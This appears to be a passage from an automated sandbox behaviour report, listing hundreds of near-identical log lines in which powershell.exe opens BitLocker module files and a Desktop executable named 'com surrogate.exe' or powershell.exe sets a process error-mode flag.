                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
